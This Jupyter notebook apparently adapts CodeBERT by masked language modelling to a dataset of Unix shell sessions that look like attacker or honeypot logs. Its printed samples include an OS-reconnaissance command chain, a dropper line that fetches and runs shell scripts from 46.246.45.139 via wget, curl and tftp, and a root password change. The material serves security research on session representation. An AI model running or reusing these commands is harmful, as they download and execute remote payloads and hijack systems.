# Domain Adaptation
## This notebook performs the domain-adaptation of an existing LM on Unix

### N.b. For the domain adaptation step, refer to:
#### https://huggingface.co/course/chapter7/3?fw=pt

### Check if CUDA is available:

In [1]:
import torch
num_devices = torch.cuda.device_count()
print(f"Number of CUDA devices: {num_devices}")
if torch.cuda.is_available():
    device = torch.device("cuda:0")

True

### Simplify level of alert warnings

In [None]:
import warnings
import datasets
warnings.simplefilter(action='ignore', category=FutureWarning)
datasets.utils.logging.set_verbosity(datasets.utils.logging.ERROR)
datasets.utils.logging.enable_progress_bar()

import transformers
transformers.utils.logging.set_verbosity(transformers.utils.logging.ERROR)
transformers.utils.logging.enable_progress_bar()

### Import config

In [4]:
import json
with open("../config.json") as f:
    config = json.load(f)

### First import the dataset

In [5]:
from datasets import load_dataset
INPUT_PATH = "../Dataset/Training/Self_Supervised/"

data_files = {"train": f"{INPUT_PATH}/training_set.csv", "validation": f"{INPUT_PATH}/validation_set.csv"}
dataset = load_dataset("csv", data_files=data_files)

Found cached dataset parquet (/home/det_user/mboffa/.cache/huggingface/datasets/parquet/default-0e91ee06387f12ff/0.0.0/2a3b91fbd88a2c90d1dbbb32b460cf621d31bd5b05b934492fdef7d8d6f236ec)


  0%|          | 0/2 [00:00<?, ?it/s]

In [6]:
dataset

DatasetDict({
    train: Dataset({
        features: ['sessions'],
        num_rows: 15856
    })
    validation: Dataset({
        features: ['sessions'],
        num_rows: 3964
    })
})

### Create features

In [7]:
from datasets import Features, Sequence, Value, ClassLabel
features = Features(
    {
        'sessions': Value(dtype='string', id=None),
    }
)

#### Not useful here but kept for compatibility
##### Elements are already strings

In [8]:
import ast
def process(ex):
    return {"sessions": ex["sessions"]}
dataset = dataset.map(process, features=features)

Loading cached processed dataset at /home/det_user/mboffa/.cache/huggingface/datasets/parquet/default-0e91ee06387f12ff/0.0.0/2a3b91fbd88a2c90d1dbbb32b460cf621d31bd5b05b934492fdef7d8d6f236ec/cache-7da0290bc4a902dc.arrow
Loading cached processed dataset at /home/det_user/mboffa/.cache/huggingface/datasets/parquet/default-0e91ee06387f12ff/0.0.0/2a3b91fbd88a2c90d1dbbb32b460cf621d31bd5b05b934492fdef7d8d6f236ec/cache-994da2f3d094b102.arrow


### Import pre-trained tokenizer
#### Must be consistent with following model

In [10]:
import os
chosen_tokenizer = "microsoft/codebert-base"
#Cache so that we don't have to download the same model multiple times
cache_folder = f"./Tokenizer/{chosen_tokenizer}/"
os.makedirs(cache_folder, exist_ok = True)    

### AutoTokenizer classes are here:

https://huggingface.co/docs/transformers/v4.25.1/en/model_doc/auto#transformers.AutoTokenizer

In [12]:
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained(f'{chosen_tokenizer}', cache_dir=f'{cache_folder}cache') # In case it is already present, do not download it again

### Notice (citing https://huggingface.co/course/chapter7/3?fw=pt)
For both auto-regressive and masked language modeling, a common preprocessing step is to concatenate all the examples and then split the whole corpus into chunks of equal size. This is quite different from our usual approach, where we simply tokenize individual examples. Why concatenate everything together? The reason is that individual examples might get truncated if they’re too long, and that would result in losing information that might be useful for the language modeling task!

### Define tokenizing function

In [16]:
def tokenize_function(examples):
    result = tokenizer(examples["sessions"])
    if tokenizer.is_fast:
        result["word_ids"] = [result.word_ids(i) for i in range(len(result["input_ids"]))]
    return result

# Use batched=True to activate fast multithreading!
tokenized_datasets = dataset.map(
    tokenize_function, batched=True, remove_columns=["sessions"]
)
tokenized_datasets

Loading cached processed dataset at /home/det_user/mboffa/.cache/huggingface/datasets/parquet/default-0e91ee06387f12ff/0.0.0/2a3b91fbd88a2c90d1dbbb32b460cf621d31bd5b05b934492fdef7d8d6f236ec/cache-2d601969fe8f2bd8.arrow


Map:   0%|          | 0/3964 [00:00<?, ? examples/s]

Token indices sequence length is longer than the specified maximum sequence length for this model (811 > 512). Running this sequence through the model will result in indexing errors


DatasetDict({
    train: Dataset({
        features: ['input_ids', 'attention_mask', 'word_ids'],
        num_rows: 15856
    })
    validation: Dataset({
        features: ['input_ids', 'attention_mask', 'word_ids'],
        num_rows: 3964
    })
})

### Let's visualize an example of how tokenization is performed

In [17]:
sample = dataset["train"].shuffle(seed=42).select(range(1))['sessions']
tokenized_sample = tokenizer(sample, add_special_tokens=True, truncation=True, max_length=512)

Loading cached shuffled indices for dataset at /home/det_user/mboffa/.cache/huggingface/datasets/parquet/default-0e91ee06387f12ff/0.0.0/2a3b91fbd88a2c90d1dbbb32b460cf621d31bd5b05b934492fdef7d8d6f236ec/cache-93fd2ff7e4f7fc5b.arrow


In [18]:
print(f"Sample:\n{sample}")
print(f"\nTokenized Sample (going to be truncated if > 512):\n{tokenized_sample.tokens()}")

Sample:
['uname -s uname -r uname -m uname -p || echo uname -v ; cat /etc/debian_release ; cat /etc/debian_version ; cat /etc/redhat-release ; cat /etc/redhat_version ; cat /etc/os-release ; cat /etc/SuSE-release ; cat /etc/fedora-release ; cat /etc/slackware-release ; cat /etc/slackware-version ; cat /etc/system-release ; cat /etc/mandrake-release ; cat /etc/yellowdog-release ; cat /etc/gentoo-release ; cat /etc/UnitedLinux-release ; cat /etc/vmware-release ; vmware -v ; uname -s uname -r uname -m uname -p || echo uname -v ; cat /etc/debian_release ; cat /etc/debian_version ; cat /etc/redhat-release ; cat /etc/enterprise-release ; cat /etc/fedora-release ; cat /etc/alpine-release ; cat /etc/slackware-release ; cat /etc/euleros-release ; cat /etc/slackware-version ; cat /etc/lsb-release ; cat /etc/system-release ; id ; cat /etc/mandrake-release ; cat /etc/yellowdog-release ; echo ; cat /etc/gentoo-release ; cat /etc/UnitedLinux-release ; echo ; cat /etc/vmware-release ; id ; vmware -v 

### Let's define the fixed size we will feed to our model

Note that using a small chunk size can be detrimental in real-world scenarios, so you should use a size that corresponds to the use case you will apply your model to.

In [20]:
chunk_size = 256 #max is 512 for the chosen model

### Example to prove mechanism is working

In [21]:
# Slicing produces a list of lists for each feature
tokenized_samples = tokenized_datasets["train"][:5]

for idx, sample in enumerate(tokenized_samples["input_ids"]):
    print(f"'Session {idx} length: {len(sample)}'")

'Session 0 length: 132'
'Session 1 length: 14'
'Session 2 length: 255'
'Session 3 length: 15'
'Session 4 length: 16'


### Concatenate them

In [22]:
concatenated_examples = {
    k: sum(tokenized_samples[k], []) for k in tokenized_samples.keys()
}
total_length = len(concatenated_examples["input_ids"])
print(f"'Concatenated sessions length: {total_length}'")

'Concatenated sessions length: 432'


### Now divide concatenation into chunks and make sure none is bigger than chosen size

In [23]:
chunks = {
    k: [t[i : i + chunk_size] for i in range(0, total_length, chunk_size)]
    for k, t in concatenated_examples.items()
}

for chunk in chunks["input_ids"]:
    print(f"'Chunk length: {len(chunk)}'")

'Chunk length: 256'
'Chunk length: 176'


### Create function that systematically group sessions

#### Chunks smaller than chunk_size will be removed

In [24]:
def group_texts(examples):
    # Concatenate all texts
    concatenated_examples = {k: sum(examples[k], []) for k in examples.keys()}
    # Compute length of concatenated texts
    total_length = len(concatenated_examples[list(examples.keys())[0]])
    # We drop the last chunk if it's smaller than chunk_size
    total_length = (total_length // chunk_size) * chunk_size
    # Split by chunks of max_len
    result = {
        k: [t[i : i + chunk_size] for i in range(0, total_length, chunk_size)]
        for k, t in concatenated_examples.items()
    }
    # Create a new labels column
    result["labels"] = result["input_ids"].copy()
    return result

Note that in the last step of group_texts() we create a new labels column which is a copy of the input_ids one. 

As we’ll see shortly, that’s because in masked language modeling the objective is to predict randomly masked tokens in the input batch, and by creating a labels column we provide the ground truth for our language model to learn from.

In [25]:
lm_datasets = tokenized_datasets.map(group_texts, batched=True)
lm_datasets

Loading cached processed dataset at /home/det_user/mboffa/.cache/huggingface/datasets/parquet/default-0e91ee06387f12ff/0.0.0/2a3b91fbd88a2c90d1dbbb32b460cf621d31bd5b05b934492fdef7d8d6f236ec/cache-fe65d2302591c878.arrow


Map:   0%|          | 0/3964 [00:00<?, ? examples/s]

DatasetDict({
    train: Dataset({
        features: ['input_ids', 'attention_mask', 'word_ids', 'labels'],
        num_rows: 31865
    })
    validation: Dataset({
        features: ['input_ids', 'attention_mask', 'word_ids', 'labels'],
        num_rows: 4594
    })
})

### Now create DataCollator

In [26]:
from transformers import DataCollatorForLanguageModeling
# Notice: probability of masking in accordance with literature
data_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer, mlm_probability=0.15)

#### An example:

In [27]:
samples = [lm_datasets["train"][i] for i in range(1)]
for sample in samples:
    _ = sample.pop("word_ids")

print(dataset["train"].select(range(1))['sessions'])
    
for chunk in data_collator(samples)["input_ids"]:
    print(f"\n'>>> {tokenizer.decode(chunk)}'")

You're using a RobertaTokenizerFast tokenizer. Please note that with a fast tokenizer, using the `__call__` method is faster than using a method to encode the text followed by a call to the `pad` method to get a padded encoding.


['echo cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.45.139/bin.sh || curl http://46.246.45.139/curl.sh -o curl.sh || tftp 46.246.45.139 -c get tftp.sh || tftp -r tftp.sh -g 46.246.45.139; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh | sh ;']

'>>> <s>echo cd responses<mask> || cd /var/run || cd /mnt ||<mask><mask>root || cd / && rm *.sh<mask> wget http://46.246.45.139/bin.sh || curl http://46.246.45<mask>139/curl.sh -o curl.sh || tft<mask> 46.246.45.139 -c get tftp.sh || t<mask>p -r tftp.sh -g 46.246.45.139; chmod + Elim *.sh<mask>./bin.sh;./curl.sh;<mask>tft<mask>.sh | sh ;</s><s>TMP<mask>FILE="$(mktemp -t)"</s><s><mask> /proc/cpuinfo | grep name | wc -<mask> ; Madden root<mask>bDYt2moltyac | chpasswd |<mask> ; echo 321 > /var/tmp<mask>var03522123 ;<mask><mask><mask> /var/tmp/. scratches<mask><mask>123 ; cat /var/tmp/.<mask>03522123 | head -n 1 ; cat /proc/cpuinfo | grep name | head -<mask> 1 | awk {<mask> $<mask>,$5,$6, Whit7<mask><mask>8,'


#### Instantiate a pre-trained model

In [28]:
from transformers import Trainer, TrainingArguments, AutoModelForMaskedLM
chosen_model = "microsoft/codebert-base"
cache_folder = f"./Model_folder/{chosen_model}/" #Same as before
os.makedirs(cache_folder, exist_ok = True)    
model = AutoModelForMaskedLM.from_pretrained(f'{chosen_model}', cache_dir=f'{cache_folder}cache') # In case it is already present, do not download it again


Some weights of RobertaForMaskedLM were not initialized from the model checkpoint at microsoft/codebert-base and are newly initialized: ['lm_head.layer_norm.bias', 'lm_head.layer_norm.weight', 'lm_head.bias', 'lm_head.dense.weight', 'lm_head.dense.bias']
You should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.


### Create trainer

In [30]:
if len(chosen_model.split("/")) > 1:
    chosen_model = chosen_model.split("/")[-1]

finetuned_model_folder = f"./Finetuned_model/{chosen_model}_bash_finetuned/"
os.makedirs(finetuned_model_folder, exist_ok = True)

In [31]:
chosen_model

'codebert-base'

In [32]:
# To save only best model in training > https://discuss.huggingface.co/t/save-only-best-model-in-trainer/8442/3
training_epochs = 5
batch_size = 16
# Show the training loss with every epoch
logging_steps = len(lm_datasets["train"]) // batch_size

fp16 = torch.cuda.is_available()

training_args = TrainingArguments(
    output_dir = f"{finetuned_model_folder}tokenizer_{tokenizer_choice}_epochs_{training_epochs}_padded_{chunk_size}/", #The output directory
    overwrite_output_dir=True, #overwrite the content of the output directory (do no continue training from cached content)
    num_train_epochs=training_epochs, # number of training epochs
    per_device_train_batch_size=batch_size, # batch size for training
    per_device_eval_batch_size=batch_size, # batch size for evaluation
    learning_rate=1e-5,
    evaluation_strategy="epoch",
    save_strategy= "epoch",
    save_total_limit = 1,
    load_best_model_at_end = True,
    fp16 = fp16 # Useful for memory requirements
    )

trainer = Trainer(
    model=model,
    args=training_args,
    data_collator=data_collator,
    train_dataset=lm_datasets["train"],
    eval_dataset=lm_datasets["validation"],
    tokenizer=tokenizer,
)

Using cuda_amp half precision backend


### Perplexity before:

In [33]:
import math
eval_results = trainer.evaluate()
print(f">>> Perplexity: {math.exp(eval_results['eval_loss']):.2f}")

The following columns in the evaluation set don't have a corresponding argument in `RobertaForMaskedLM.forward` and have been ignored: word_ids. If word_ids are not expected by `RobertaForMaskedLM.forward`,  you can safely ignore this message.
***** Running Evaluation *****
  Num examples = 4594
  Batch size = 16


>>> Perplexity: 42874495.18


#### Training function

In [34]:
trainer.train()

The following columns in the training set don't have a corresponding argument in `RobertaForMaskedLM.forward` and have been ignored: word_ids. If word_ids are not expected by `RobertaForMaskedLM.forward`,  you can safely ignore this message.
***** Running training *****
  Num examples = 31865
  Num Epochs = 5
  Instantaneous batch size per device = 16
  Total train batch size (w. parallel, distributed & accumulation) = 16
  Gradient Accumulation steps = 1
  Total optimization steps = 9960
  Number of trainable parameters = 124697433


Epoch,Training Loss,Validation Loss
1,0.8596,0.852938
2,0.6475,0.680905
3,0.5609,0.607771
4,0.5136,0.575645
5,0.5151,0.566897


The following columns in the evaluation set don't have a corresponding argument in `RobertaForMaskedLM.forward` and have been ignored: word_ids. If word_ids are not expected by `RobertaForMaskedLM.forward`,  you can safely ignore this message.
***** Running Evaluation *****
  Num examples = 4594
  Batch size = 16
Saving model checkpoint to /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/checkpoint-1992
Configuration saved in /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/checkpoint-1992/config.json
Model weights saved in /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/checkpoint-1992/pytorch_model.bin
tokenizer config file saved in /share/smartdata/huawei

TrainOutput(global_step=9960, training_loss=0.7048988158444324, metrics={'train_runtime': 1439.6097, 'train_samples_per_second': 110.672, 'train_steps_per_second': 6.919, 'total_flos': 2.09723849698176e+16, 'train_loss': 0.7048988158444324, 'epoch': 5.0})

### After training

In [35]:
eval_results = trainer.evaluate()
print(f">>> Perplexity: {math.exp(eval_results['eval_loss']):.2f}")

The following columns in the evaluation set don't have a corresponding argument in `RobertaForMaskedLM.forward` and have been ignored: word_ids. If word_ids are not expected by `RobertaForMaskedLM.forward`,  you can safely ignore this message.
***** Running Evaluation *****
  Num examples = 4594
  Batch size = 16


>>> Perplexity: 1.76


### Saving model

In [36]:
trainer.save_model() # Model will be available at the output_dir folder

Saving model checkpoint to /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/
Configuration saved in /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/config.json
Model weights saved in /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/pytorch_model.bin
tokenizer config file saved in /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/tokenizer_config.json
Special tokens file saved in /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/special_tokens